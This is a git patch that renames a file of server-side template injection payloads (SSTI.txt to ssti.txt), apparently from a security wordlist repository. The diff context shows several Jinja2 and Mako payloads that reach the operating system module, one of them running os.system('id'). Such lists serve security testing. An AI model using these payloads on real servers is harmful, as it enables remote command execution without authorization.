From 0f8e81636db3f1099cc3913d8dbc13a23ffffde1 Mon Sep 17 00:00:00 2001 From: Krypton Date: Sun, 30 Apr 2023 12:49:47 +0200 Subject: [PATCH] Rename SSTI.txt to ssti.txt --- vulnerabilities/{SSTI.txt => ssti.txt} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/{SSTI.txt => ssti.txt} (99%) diff --git a/vulnerabilities/SSTI.txt b/vulnerabilities/ssti.txt similarity index 99% rename from vulnerabilities/SSTI.txt rename to vulnerabilities/ssti.txt index f51b023..d818717 100644 --- a/vulnerabilities/SSTI.txt +++ b/vulnerabilities/ssti.txt @@ -104,4 +104,4 @@ ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.namespace.__init__.__globals__.os}} {{cycler.__init__.__globals__.os}} {{joiner.__init__.__globals__.os}} -{{namespace.__init__.__globals__.os}} \ No newline at end of file +{{namespace.__init__.__globals__.os}}